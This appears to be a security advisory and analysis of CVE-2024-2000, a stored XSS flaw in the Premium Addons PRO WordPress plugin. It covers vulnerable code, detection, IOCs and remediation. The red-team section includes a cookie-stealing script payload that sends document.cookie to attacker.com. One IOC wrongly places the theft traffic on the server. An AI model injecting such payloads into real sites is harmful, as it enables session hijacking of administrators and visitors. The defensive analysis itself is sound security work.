CVE-2024-2000
Executive Summary
CVE-2024-2000 is a Stored Cross-Site Scripting (XSS) vulnerability in the Premium Addons PRO WordPress plugin, affecting versions up to and including 2.9.12. The flaw resides in the navigation_dots parameter of the Multi Scroll Widget. Due to insufficient input sanitization and output escaping, authenticated attackers with contributor-level access or higher can inject arbitrary web scripts. When a user accesses a page containing the injected payload, the script executes in the context of the victim’s browser, potentially leading to session hijacking, credential theft, or defacement.
This vulnerability is part of the WordPress ecosystem and does not affect Apache or Nginx directly. The CVSS score is 6.4 (Medium), and the EPSS score is 0.0%, indicating low exploitation likelihood at the time of analysis. No public proof-of-concept or exploit code is available, but the risk remains for sites with untrusted contributors.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository and commercial channels. Organizations using Premium Addons PRO should verify their version and apply any available patches. Since the plugin is a third-party component, it introduces supply chain risk; ensure that only trusted contributors have access to the site.
CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (contributor-level)
- User Interaction: None (script executes automatically)
- Scope: Changed (vulnerability impacts resources beyond the vulnerable component)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. The vulnerability requires authentication but is easy to exploit once access is obtained. The impact is limited to client-side attacks, but combined with social engineering, it can lead to broader compromise.
Deep Dive & Mechanics
The Multi Scroll Widget in Premium Addons PRO allows users to create multi-scrolling sections. The navigation_dots parameter controls the appearance of navigation dots. The plugin fails to properly sanitize user input and escape output when rendering this parameter. An attacker with contributor-level access can inject malicious JavaScript into the parameter, which is stored in the database. When the widget is rendered on a page, the injected script executes in the browser of any visitor.
Root Cause: The plugin uses echo or similar output functions without applying esc_attr() or esc_html() on the navigation_dots value. Additionally, input validation does not strip script tags or event handlers.
Attack Flow:
- Attacker logs in with contributor-level credentials.
- Attacker creates or edits a page using the Multi Scroll Widget.
- Attacker sets the
navigation_dotsparameter to a payload like"><script>alert('XSS')</script>. - The payload is stored in the WordPress database.
- When any user (including admins) visits the page, the script executes.
Vulnerable vs. Patched Code
Vulnerable Code (version <= 2.9.12):
// In the widget render method
$navigation_dots = $settings['navigation_dots'];
echo '<div class="multi-scroll-nav-dots" data-dots="' . $navigation_dots . '">';
Patched Code (hypothetical fix):
// Properly escape the output
$navigation_dots = esc_attr($settings['navigation_dots']);
echo '<div class="multi-scroll-nav-dots" data-dots="' . $navigation_dots . '">';
The fix uses esc_attr() to encode special characters, preventing script injection. Input validation should also be added to reject or sanitize dangerous content.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- WordPress site with Premium Addons PRO <= 2.9.12
- Contributor-level account or higher
Steps:
- Log in to WordPress as a contributor.
- Navigate to Pages > Add New.
- Add the Multi Scroll Widget to the page.
- In the widget settings, locate the
navigation_dotsfield. - Inject a payload such as:
"><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> - Save and publish the page.
- When an admin or visitor views the page, the script executes, exfiltrating cookies.
Note: No public exploit code is available; this is a conceptual demonstration.
Blue Team (Detection & Prevention)
Detection:
- Monitor for unusual changes to page content by contributors.
- Look for script tags or event handlers in the
navigation_dotsfield in database logs. - Use Web Application Firewall (WAF) rules to block common XSS patterns.
Prevention:
- Update the plugin to the latest version once a patch is released.
- Restrict contributor-level access to trusted users only.
- Implement Content Security Policy (CSP) headers to mitigate XSS impact.
Indicators of Compromise (IOCs)
- File:
/wp-content/plugins/premium-addons-pro/widgets/multi-scroll.php(vulnerable file) - Database: Entries in
wp_postmetawithmeta_keycontainingnavigation_dotsandmeta_valuecontaining<script>tags or event handlers. - Network: Outbound requests to attacker-controlled domains from the WordPress server (e.g.,
GET /steal?cookie=...). - Logs: WordPress audit logs showing page edits by contributors with suspicious payloads.

Remediation & Mitigation
Immediate Actions:
- Update the plugin: If a patched version is released, update immediately. Check the plugin vendor’s site for updates.
- Disable the Multi Scroll Widget: Temporarily remove or disable the widget until a patch is applied.
- Restrict user roles: Remove contributor-level access from untrusted users. Use the principle of least privilege.
Long-term Mitigations:
- Implement a Web Application Firewall (WAF) with XSS rules.
- Enforce Content Security Policy (CSP) headers to block inline scripts.
- Regularly audit WordPress plugins and themes for vulnerabilities.
- Use security plugins like Wordfence to monitor for malicious activity.
Patch Status: UNKNOWN. Monitor the vendor’s changelog for version 2.9.13 or later.
